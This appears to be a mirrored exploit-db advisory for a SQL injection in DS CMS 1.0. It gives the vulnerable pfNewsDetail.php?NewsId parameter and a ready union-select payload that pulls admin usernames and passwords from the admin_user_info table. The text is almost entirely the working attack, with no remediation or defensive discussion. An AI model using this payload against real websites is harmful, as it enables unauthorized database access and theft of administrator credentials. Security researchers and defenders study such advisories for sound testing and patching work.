DS CMS 1.0 – ‘NewsId’ SQL Injection

  • 作者: Palyo34
    日期: 2010-01-01
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/10889/
  •  Script: DS CMS 1.0 (NewsId) Remote SQL Injection Vulnerability

 Script site : http://cms.dsinternal.com/Home 

 AUTHOR:Palyo34 
 
 HOME: http://www.1923turk.biz
=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================
exploit:
-------
http://server/path/pfNewsDetail.php?NewsId=[SQL]

Example:

-1/**/union/**/all/**/select/**/1,2,group_concat(UserPass,0x3a,UserName),4+from+admin_user_info--